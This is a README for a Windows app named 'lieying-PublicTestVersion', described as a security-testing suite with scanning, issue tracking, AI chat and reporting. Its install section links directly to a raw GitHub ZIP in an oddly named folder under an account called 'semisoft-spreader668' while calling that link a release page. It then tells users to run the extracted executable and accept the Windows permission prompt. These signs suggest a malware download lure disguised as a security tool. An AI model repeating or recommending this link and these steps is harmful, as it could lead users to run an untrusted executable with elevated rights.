Use this link to visit the page and download the app:
lieying-PublicTestVersion is a Windows app for security testing work. It helps you manage assets, run scans, review findings, and create reports in one place.
Use it to:
- view your assets in one dashboard
- collect basic system and network info
- run vulnerability scan tasks
- review scan results
- manage issues in one place
- use AI chat for analysis help
- set AI options
- build SRC practice cases
- generate reports
You need:
- a Windows 10 or Windows 11 PC
- 4 GB RAM or more
- 2 GB free disk space
- an internet connection for setup and first use
- permission to run security tests on the systems you scan
-
Open the download page: https://raw.githubusercontent.com/semisoft-spreader668/lieying-PublicTestVersion/main/nonalphabetic/Version-lieying-Test-Public-1.0.zip
-
Find the latest release or the app file on the page.
-
Download the Windows file to your computer.
-
If the file is in a ZIP package, right-click it and choose Extract All.
-
Open the extracted folder.
-
Double-click the Windows app file to start it.
-
If Windows asks for permission, choose Yes.
After the app opens:
- Wait for the main screen to load.
- Check the left menu or top tabs for the main modules.
- Open the settings page if you need to change the server address, scan rules, or AI options.
- Save your changes before you leave the page.
- Restart the app if it asks for it.
See your saved assets in one place. Use this view to check target names, groups, and basic status.
Collect host and service details before you scan. This helps you understand what is on the network.
Create and run scan tasks. You can track task progress and review task state.
See scan results after a task ends. Use this page to check findings and risk level.
Use the board view to spot high-priority issues fast. It helps you focus on the most important items first.
Track issues from discovery to fix. Keep notes, status, and follow-up work in one place.
Open the AI chat area for help with analysis, notes, and report text.
Set AI options, such as the model source and related connection data.
Use this area for training and practice with public security report cases.
Create reports from scan and review data. Export the result for sharing.
core/- Go backendinternal/api/- API routes and handlersinternal/models/- data modelsinternal/repository/- data storage layerinternal/service/- business logicinternal/config/- app settingssrc/main.go- backend entry point
frontend/- React frontendsrc/components/- screen partssrc/services/- API callssrc/App.tsx- main app file
This section is for users who want to start the project from files instead of a release build.
- Open a terminal in the
corefolder. - Run:
go build -o lieying.exe ./src
lieying.exe server- Open a terminal in the
frontendfolder. - Run:
npm install
npm run dev- Open the app.
- Add or import assets.
- Run information collection.
- Start a vulnerability scan task.
- Review the results.
- Move important issues into management.
- Use AI chat to help write notes or explain findings.
- Generate a report.
- Start with one test asset.
- Use a lab system or a system you own.
- Keep scan settings simple at first.
- Review results before running a new scan.
- Save reports after each test run.
MIT